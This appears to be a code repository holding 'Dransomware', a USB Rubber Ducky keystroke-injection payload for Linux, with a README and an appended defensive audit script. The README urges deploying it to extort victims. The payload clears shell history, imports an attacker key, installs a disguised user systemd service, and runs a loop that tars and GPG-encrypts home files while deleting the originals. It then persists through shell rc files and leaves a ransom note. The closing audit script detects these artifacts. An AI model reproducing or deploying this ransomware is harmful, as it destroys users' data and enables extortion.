├── README.md
└── payload.txt

/README.md:
--------------------------------------------------------------------------------
# Dransomware

## About:
* Title: Dransomware
* Description: Ransomware which encrypts the user's data without root privileges
* AUTHOR: drapl0n
* Version: 1.0
* Category: Ransomware
* Target: GNU/Linux
* Attackmodes: HID

## Dransomware is a USB Rubber Ducky script with ransomware that encrypts the user's data without root privileges in 30 seconds.

* Deploy Dransomware, negotiate with the victim and acquire the ransom in exchange for the private key.
* Tested on Kali Linux and Parrot OS.
* For educational purposes only.

### Changes to be made:
* Change the public key in the [importing gpg public key] section.
* Change your key name in the [dransomware] section.
* Optional: you can change the paths (be careful while doing this).
* Change your contact details in order to contact the user and acquire the ransom.

### Workflow:
1. Stop storing shell history; this keeps the tracks clear from the beginning.
2. Import the public GPG key (this can be done by storing the key on a server and fetching it via wget or curl to reduce execution time).
3. Create a non-root systemd service.
4. Deploy the ransomware.
5. Autostart the service when a terminal is opened with a shell (bash and zsh).
6. Enter the message.

#### Support me if you like my work:
* https://twitter.com/drapl0n

--------------------------------------------------------------------------------
/payload.txt:
--------------------------------------------------------------------------------
REM Title: Dransomware
REM Description: Ransomware which encrypts users data without root privileges
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Ransomware
REM Target: GNU/Linux
REM Attackmodes: HID

REM [importing gpg public key]
DELAY 500
CTRL-ALT t
DELAY 1000
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 300
REM Rather than typing the key in, you can upload your key to a server and fetch it using wget or curl.
REM This method is for the scenario where the system has no internet access.
STRING touch public.pub
ENTER
DELAY 200
STRING vi public.pub
ENTER
DELAY 50
STRING i
DELAY 200
STRING -----BEGIN PGP PUBLIC KEY BLOCK-----
ENTER
ENTER
REM (the armored key body, typed as STRING/ENTER pairs, is omitted from this listing)
STRING -----END PGP PUBLIC KEY BLOCK-----
ESC
DELAY 300
STRING :wq
ENTER
DELAY 300
STRING gpg --import public.pub && rm -rf public.pub
ENTER


REM [Creating systemd service for non-root user]
DELAY 200
REM This is the path where encrypted directories will be stored
STRING mkdir ~/.ransom
ENTER
DELAY 100
STRING mkdir -p ~/.config/systemd/user && touch ~/.config/systemd/user/libSystemIO.service
ENTER
DELAY 200
ENTER
STRING cat >> ~/.config/systemd/user/libSystemIO.service
DELAY 200
ENTER
DELAY 50
STRING [Unit]
ENTER
REM You can change the service description
STRING Description = Ransom
ENTER
ENTER
STRING [Service]
ENTER
CTRL d
STRING echo ExecStart=/bin/bash /home/$(whoami)/.system/drans -no-browser >> ~/.config/systemd/user/libSystemIO.service
ENTER
STRING cat >> ~/.config/systemd/user/libSystemIO.service
ENTER
STRING Restart=on-failure
ENTER
STRING SuccessExitStatus=3 4
ENTER
STRING RestartForceExitStatus=3 4
ENTER
ENTER
STRING [Install]
ENTER
STRING WantedBy=default.target
ENTER
CTRL d
ENTER

REM [dransomware]
DELAY 500
STRING mkdir ~/.system && touch ~/.system/drans && vi ~/.system/drans
ENTER
STRING i
DELAY 200
STRING #!/bin/sh
ENTER
STRING cd ~/
ENTER
STRING encrypt(){
ENTER
STRING dirFile=$(ls | head -n 1)
ENTER
STRING tar cf ~/.ransom/$dirFile.tar.gz --exclude='.' --exclude='..' --exclude='.ransom' --remove-files $dirFile
ENTER
REM replace drans with the name of your key
STRING gpg -e -r drans -o ~/.ransom/$dirFile.tar.gpg ~/.ransom/$dirFile.tar.gz && rm -rf ~/.ransom/$dirFile.tar.gz
ENTER
STRING }
ENTER
STRING for (( ; ; ))
ENTER
STRING do
ENTER
STRING encrypt
ENTER
STRING done
DELAY 100
ESC
STRING :wq
ENTER
DELAY 100
STRING chmod +x ~/.system/drans
ENTER
DELAY 100
REM change drans to the name of your key
STRING gpg --edit-key drans
ENTER
DELAY 100
STRING trust
ENTER
DELAY 100
STRING 5
ENTER
DELAY 50
STRING y
ENTER
CTRL c
DELAY 100
STRING gpg --check-trustdb
ENTER
STRING gpg --update-trustdb
ENTER
DELAY 100
STRING systemctl --user enable --now libSystemIO.service
ENTER
DELAY 100
STRING systemctl --user start libSystemIO.service
ENTER
DELAY 100
DELAY 50

REM [autostart on opening terminal]
STRING echo systemctl --user enable --now libSystemIO.service >> ~/.zshrc
ENTER
DELAY 50
STRING echo systemctl --user enable --now libSystemIO.service >> ~/.bashrc
ENTER

REM [Message]
REM change the message used to demand the ransom
STRING mkdir ~/.hacker/ && touch ~/.hacker/README.txt
ENTER
DELAY 100
STRING echo I'm Hacker Don't try to ShutDown your system this will permanantly delete your data, contact test@test.com for further details... >> ~/.hacker/README.txt
ENTER
DELAY 50
STRING exit
ENTER
--------------------------------------------------------------------------------
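As an added defender-side example that is not part of the Dransomware repository: a POSIX shell audit that checks a home directory for the artifacts the payload above leaves behind (a user-level systemd unit whose ExecStart points into a hidden directory, `systemctl --user enable` lines appended to shell rc files, the `.ransom`/`.system`/`.hacker` staging directories, and `.tar.gpg` archives). The names it looks for are taken from payload.txt; the sample home it builds for the demo is constructed and inert.

```shell
#!/bin/sh
# Audit a home directory for the persistence and staging artifacts the Dransomware
# payload creates. Added example, not project code; names come from payload.txt.

# audit_home DIR: print one finding per line; prints nothing for a clean home.
audit_home() {
    h="$1"
    # 1. user-level systemd units whose ExecStart runs a file from a hidden directory
    for unit in "$h"/.config/systemd/user/*.service; do
        [ -f "$unit" ] || continue
        grep -Eq '^ExecStart=.*/\.[A-Za-z0-9_]+/' "$unit" && echo "unit-hidden-execstart: $unit"
    done
    # 2. shell rc files that (re-)enable a user service on every interactive shell
    for rc in .bashrc .zshrc .profile; do
        [ -f "$h/$rc" ] || continue
        grep -Eq 'systemctl +--user +enable' "$h/$rc" && echo "rc-enables-user-service: $h/$rc"
    done
    # 3. staging directories named in the payload
    for d in .ransom .system .hacker; do
        [ -d "$h/$d" ] && echo "hidden-staging-dir: $h/$d"
    done
    # 4. encrypted archives produced by the payload's encrypt loop
    for f in "$h"/.ransom/*.tar.gpg; do
        [ -f "$f" ] && echo "encrypted-archive: $f"
    done
    return 0
}

# count_findings DIR: number of findings (0 for a clean home).
count_findings() { audit_home "$1" | wc -l | tr -d ' '; }

# make_sample_home DIR: constructed, inert copy of the artifacts, for exercising the audit.
make_sample_home() {
    h="$1"
    mkdir -p "$h/.config/systemd/user" "$h/.ransom" "$h/.system" "$h/.hacker"
    printf '[Service]\nExecStart=/bin/bash /home/alice/.system/drans -no-browser\n' \
        > "$h/.config/systemd/user/libSystemIO.service"
    echo 'systemctl --user enable --now libSystemIO.service' >> "$h/.bashrc"
    echo 'systemctl --user enable --now libSystemIO.service' >> "$h/.zshrc"
    : > "$h/.ransom/Documents.tar.gpg"
}

tmp=$(mktemp -d)
make_sample_home "$tmp/victim"
mkdir -p "$tmp/clean"
audit_home "$tmp/victim"
echo "findings in constructed sample: $(count_findings "$tmp/victim")"   # prints 7
echo "findings in clean home: $(count_findings "$tmp/clean")"            # prints 0
```

Run it against a real account as `audit_home "$HOME"`; the unit and rc-file checks are generic enough to flag other user-level persistence that borrows the same mechanism.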